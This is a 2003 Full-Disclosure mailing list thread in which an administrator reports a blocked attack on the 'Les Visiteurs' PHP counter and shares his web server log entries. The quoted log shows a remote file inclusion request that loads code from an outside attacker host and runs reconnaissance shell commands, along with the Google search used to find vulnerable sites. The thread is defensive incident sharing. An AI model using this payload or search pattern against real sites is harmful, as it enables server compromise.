[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] file inclusion (les visiteurs)
- To: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@nsrg-security.com>, "Full-Disclosure" <full-disclosure@lists.netsys.com>, <dan@lockedbox.net>
- Subject: Re: [Full-Disclosure] file inclusion (les visiteurs)
- From: "Evert Daman" <evert@digipix.org>
- Date: Mon, 1 Dec 2003 22:10:48 +0100
i was curious about how they found my site stats (the where in
a not-standard-directory...)
looks like they googled their way in :)
[root@server evert]# zcat /var/log/httpd/access_log.1.gz | grep
200.138.213.246
200.138.213.246 - - [29/Nov/2003:20:53:13 +0100] "GET
/counter/?view=year&ypd=1 HTTP/1.1" 200 14565
"http://www.google.com.br/search?num=100&hl=pt-BR&ie=UTF-8&oe=UTF-8&q=allinu
rl%3A+%3Fview%3Dyear+ypd%3D1&meta=" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.0; .NET CLR 1.1.4322)"
200.138.213.246 - - [29/Nov/2003:20:53:14 +0100] "GET
/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.
org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls HTTP/1.1"
401 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)"
[root@server evert]#
kind regards,
Evert
> Hi Daniel ,
> They are kiddies... :(
> I was looking the files and there are only high-risk-rated exploits
> downloaded from packet storm , ptrace , etc .
> And they are running remote php shells in their server.... xD
>
> See you in the IRC tonight ?
>
> Best regards,
> -------------------------------
> 0x00->Lorenzo Hernandez Garcia-Hierro
> 0x01->\x74\x72\x75\x6c\x75\x78
> 0x02->The truth is out there,
> 0x03-> outside your mind .
> __________________________________
> PGP: Keyfingerprint
> 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
> ID: 0x91805F5B
> **********************************
> \x6e\x73\x72\x67
> \x73\x65\x63\x75\x72\x69\x74\x79
> \x72\x65\x73\x65\x61\x72\x63\x68
> http://www.nsrg-security.com
> ______________________
> ----- Original Message -----
> From: "Dan" <dan@lockedbox.net>
> To: <full-disclosure@lists.netsys.com>
> Sent: Monday, December 01, 2003 6:02 PM
> Subject: Re: [Full-Disclosure] file inclusion (les visiteurs)
>
>
> > This is the same set of files that I noticed last week(xfteam.net) it
> seems
> > they closed their domain down? (I cannot find it)
> > Does anyone know if these ppl are a real sec organisation? or just some
> > kiddies ?
> >
> > Cheers,
> > Daniel.
> >
> > "Evert Daman" <evert@digipix.org> wrote:
> >
> > >
> > > last night snort detected this request:
> > >
> > > GET
> > >
> >
>
/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.
> org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
> > >
> > >
> > > because i patched 'les visiteurs' as described by 'matthieu peschaud'
> > > on bugtraq on the 26 of october nothing happend, but it looks like
> someone
> > > is trying to exploit this bug.
> > > just want to mention it to this wonderfull list :)
> > >
> > > kind regards,
> > > Evert
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html